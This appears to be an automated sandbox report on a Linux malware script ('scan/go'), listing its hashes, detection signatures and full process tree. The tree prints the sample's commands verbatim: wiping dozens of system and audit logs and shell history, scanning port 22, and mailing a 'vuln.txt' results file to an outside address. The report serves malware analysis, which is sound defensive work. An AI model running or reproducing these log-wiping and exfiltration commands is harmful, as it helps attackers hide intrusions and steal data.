Analysis

  • max time kernel
    21s
  • max time network
    14s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20231222-en
  • resource tags

    arch:mipsel, image:debian9-mipsel-20231222-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
  • submitted
    22/12/2023, 08:25

General

  • Target

    scan/go

  • Size

    794B

  • MD5

    fd52040029cde6318569f91abc1090fc

  • SHA1

    65117e69cfc77df7db1d0695eb66903093e2e397

  • SHA256

    150ad9bc0078b993db48ed0d373723df82c89e23c3d1dcfb795aac3f5853a5cc

  • SHA512

    5f707d39c2494cf7bc41acc3a5402d1442ab12c4cc2c73c9f15dedac7e9d37d25a01119a02887e442bdeaacc3f3290b6dd33f1c5cdbbca011df140c11ce129f7

Score
7/10

Malware Config

Signatures

  • Deletes Audit logs 1 TTPs 1 IoCs

    Deletes logs related to the Linux Audit framework.

  • Deletes system logs 1 TTPs 4 IoCs

    Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

  • Deletes log files 1 TTPs 48 IoCs

    Deletes log files on the system.

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/scan/go
    /tmp/scan/go
    1⤵
    • Writes file to tmp directory
    PID:742
    • /bin/ls
      ls /var/log/
      2⤵
      • Reads runtime system information
      PID:748
    • /bin/rm
      rm -rf /var/log/alternatives.log
      2⤵
      • Deletes log files
      PID:749
    • /usr/bin/touch
      touch /var/log/alternatives.log
      2⤵
      PID:750
    • /bin/rm
      rm -rf /var/log/apt
      2⤵
      • Deletes log files
      PID:752
    • /usr/bin/touch
      touch /var/log/apt
      2⤵
      PID:754
    • /bin/rm
      rm -rf /var/log/audit
      2⤵
      • Deletes Audit logs
      • Deletes log files
      PID:755
    • /usr/bin/touch
      touch /var/log/audit
      2⤵
      PID:756
    • /bin/rm
      rm -rf /var/log/auth.log
      2⤵
      • Deletes log files
      PID:757
    • /usr/bin/touch
      touch /var/log/auth.log
      2⤵
      PID:759
    • /bin/rm
      rm -rf /var/log/btmp
      2⤵
      • Deletes log files
      PID:761
    • /usr/bin/touch
      touch /var/log/btmp
      2⤵
      PID:763
    • /bin/rm
      rm -rf /var/log/daemon.log
      2⤵
      • Deletes log files
      PID:764
    • /usr/bin/touch
      touch /var/log/daemon.log
      2⤵
      PID:765
    • /bin/rm
      rm -rf /var/log/debug
      2⤵
      • Deletes log files
      PID:766
    • /usr/bin/touch
      touch /var/log/debug
      2⤵
      PID:767
    • /bin/rm
      rm -rf /var/log/dpkg.log
      2⤵
      • Deletes log files
      PID:769
    • /usr/bin/touch
      touch /var/log/dpkg.log
      2⤵
      PID:770
    • /bin/rm
      rm -rf /var/log/exim4
      2⤵
      • Deletes log files
      PID:771
    • /usr/bin/touch
      touch /var/log/exim4
      2⤵
      PID:772
    • /bin/rm
      rm -rf /var/log/faillog
      2⤵
      • Deletes log files
      PID:773
    • /usr/bin/touch
      touch /var/log/faillog
      2⤵
      PID:774
    • /bin/rm
      rm -rf /var/log/fontconfig.log
      2⤵
      • Deletes log files
      PID:775
    • /usr/bin/touch
      touch /var/log/fontconfig.log
      2⤵
      PID:777
    • /bin/rm
      rm -rf /var/log/installer
      2⤵
      • Deletes log files
      PID:778
    • /usr/bin/touch
      touch /var/log/installer
      2⤵
      PID:779
    • /bin/rm
      rm -rf /var/log/kern.log
      2⤵
      • Deletes log files
      PID:780
    • /usr/bin/touch
      touch /var/log/kern.log
      2⤵
      PID:781
    • /bin/rm
      rm -rf /var/log/lastlog
      2⤵
      • Deletes log files
      PID:782
    • /usr/bin/touch
      touch /var/log/lastlog
      2⤵
      PID:783
    • /bin/rm
      rm -rf /var/log/messages
      2⤵
      • Deletes system logs
      PID:784
    • /usr/bin/touch
      touch /var/log/messages
      2⤵
      PID:785
    • /bin/rm
      rm -rf /var/log/syslog
      2⤵
      • Deletes system logs
      PID:786
    • /usr/bin/touch
      touch /var/log/syslog
      2⤵
      PID:787
    • /bin/rm
      rm -rf /var/log/user.log
      2⤵
      • Deletes log files
      PID:788
    • /usr/bin/touch
      touch /var/log/user.log
      2⤵
      PID:789
    • /bin/rm
      rm -rf /var/log/wtmp
      2⤵
      • Deletes log files
      PID:790
    • /usr/bin/touch
      touch /var/log/wtmp
      2⤵
      PID:791
    • /bin/sleep
      sleep 2
      2⤵
      PID:792
    • /bin/cat
      cat motd
      2⤵
      PID:793
    • /tmp/scan/class
      ./class 22 -a -i eth0 -s 10
      2⤵
      PID:794
    • /bin/cat
      cat bios.txt
      2⤵
      PID:795
    • /usr/bin/sort
      sort
      2⤵
      PID:796
    • /usr/bin/uniq
      uniq
      2⤵
      PID:797
    • /bin/grep
      grep -c . mfu.txt
      2⤵
      PID:798
    • /tmp/scan/update
      ./update 1500
      2⤵
      PID:799
    • /bin/cat
      cat vuln.txt
      2⤵
      PID:800
    • /usr/bin/mail
      mail -s gugolete "[email protected]"
      2⤵
      • Writes file to tmp directory
      PID:801
      • /usr/sbin/sendmail
        /usr/sbin/sendmail -oi -f "root@debian9-mipsel-20231222-en-8" -t
        3⤵
        • Reads runtime system information
        PID:847
    • /bin/rm
      rm -rf /root/.bash_history
      2⤵
      PID:851
    • /usr/bin/touch
      touch /root/.bash_history
      2⤵
      PID:853
    • /bin/ls
      ls /var/log/
      2⤵
      • Reads runtime system information
      PID:854
    • /bin/rm
      rm -rf /var/log/alternatives.log
      2⤵
      • Deletes log files
      PID:855
    • /usr/bin/touch
      touch /var/log/alternatives.log
      2⤵
      PID:856
    • /bin/rm
      rm -rf /var/log/apt
      2⤵
      • Deletes log files
      PID:858
    • /usr/bin/touch
      touch /var/log/apt
      2⤵
      PID:860
    • /bin/rm
      rm -rf /var/log/audit
      2⤵
      • Deletes log files
      PID:861
    • /usr/bin/touch
      touch /var/log/audit
      2⤵
      PID:862
    • /bin/rm
      rm -rf /var/log/auth.log
      2⤵
      • Deletes log files
      PID:863
    • /usr/bin/touch
      touch /var/log/auth.log
      2⤵
      PID:865
    • /bin/rm
      rm -rf /var/log/btmp
      2⤵
      • Deletes log files
      PID:866
    • /usr/bin/touch
      touch /var/log/btmp
      2⤵
      PID:868
    • /bin/rm
      rm -rf /var/log/daemon.log
      2⤵
      • Deletes log files
      PID:869
    • /usr/bin/touch
      touch /var/log/daemon.log
      2⤵
      PID:870
    • /bin/rm
      rm -rf /var/log/debug
      2⤵
      • Deletes log files
      PID:871
    • /usr/bin/touch
      touch /var/log/debug
      2⤵
      PID:873
    • /bin/rm
      rm -rf /var/log/dpkg.log
      2⤵
      • Deletes log files
      PID:874
    • /usr/bin/touch
      touch /var/log/dpkg.log
      2⤵
      PID:876
    • /bin/rm
      rm -rf /var/log/exim4
      2⤵
      • Deletes log files
      PID:877
    • /usr/bin/touch
      touch /var/log/exim4
      2⤵
      PID:878
    • /bin/rm
      rm -rf /var/log/faillog
      2⤵
      • Deletes log files
      PID:879
    • /usr/bin/touch
      touch /var/log/faillog
      2⤵
      PID:881
    • /bin/rm
      rm -rf /var/log/fontconfig.log
      2⤵
      • Deletes log files
      PID:882
    • /usr/bin/touch
      touch /var/log/fontconfig.log
      2⤵
      PID:884
    • /bin/rm
      rm -rf /var/log/installer
      2⤵
      • Deletes log files
      PID:885
    • /usr/bin/touch
      touch /var/log/installer
      2⤵
      PID:886
    • /bin/rm
      rm -rf /var/log/kern.log
      2⤵
      • Deletes log files
      PID:887
    • /usr/bin/touch
      touch /var/log/kern.log
      2⤵
      PID:889
    • /bin/rm
      rm -rf /var/log/lastlog
      2⤵
      • Deletes log files
      PID:891
    • /usr/bin/touch
      touch /var/log/lastlog
      2⤵
      PID:892
    • /bin/rm
      rm -rf /var/log/mail.err
      2⤵
      • Deletes log files
      PID:893
    • /usr/bin/touch
      touch /var/log/mail.err
      2⤵
      PID:894
    • /bin/rm
      rm -rf /var/log/mail.info
      2⤵
      • Deletes log files
      PID:896
    • /usr/bin/touch
      touch /var/log/mail.info
      2⤵
      PID:897
    • /bin/rm
      rm -rf /var/log/mail.log
      2⤵
      • Deletes log files
      PID:899
    • /usr/bin/touch
      touch /var/log/mail.log
      2⤵
      PID:900
    • /bin/rm
      rm -rf /var/log/mail.warn
      2⤵
      • Deletes log files
      PID:901
    • /usr/bin/touch
      touch /var/log/mail.warn
      2⤵
      PID:902
    • /bin/rm
      rm -rf /var/log/messages
      2⤵
      • Deletes system logs
      PID:904
    • /usr/bin/touch
      touch /var/log/messages
      2⤵
      PID:905
    • /bin/rm
      rm -rf /var/log/syslog
      2⤵
      • Deletes system logs
      PID:907
    • /usr/bin/touch
      touch /var/log/syslog
      2⤵
      PID:908
    • /bin/rm
      rm -rf /var/log/user.log
      2⤵
      • Deletes log files
      PID:909
    • /usr/bin/touch
      touch /var/log/user.log
      2⤵
      PID:910
    • /bin/rm
      rm -rf /var/log/wtmp
      2⤵
      • Deletes log files
      PID:912
    • /usr/bin/touch
      touch /var/log/wtmp
      2⤵
      PID:914
    • /bin/sleep
      sleep 5
      2⤵
      PID:915
    • /tmp/scan/clean
      ./clean
      2⤵
      PID:926

Network

MITRE ATT&CK Enterprise v15

Downloads

• /root/dead.letter

  Filesize

  153B

• /var/spool/exim4/input/1rH0PB-0000Df-PK-D

  Filesize

  19B

• /var/spool/exim4/input/hdr.847

  Filesize

  740B

• /var/spool/exim4/msglog/1rH0PB-0000Df-PK

  Filesize

  89B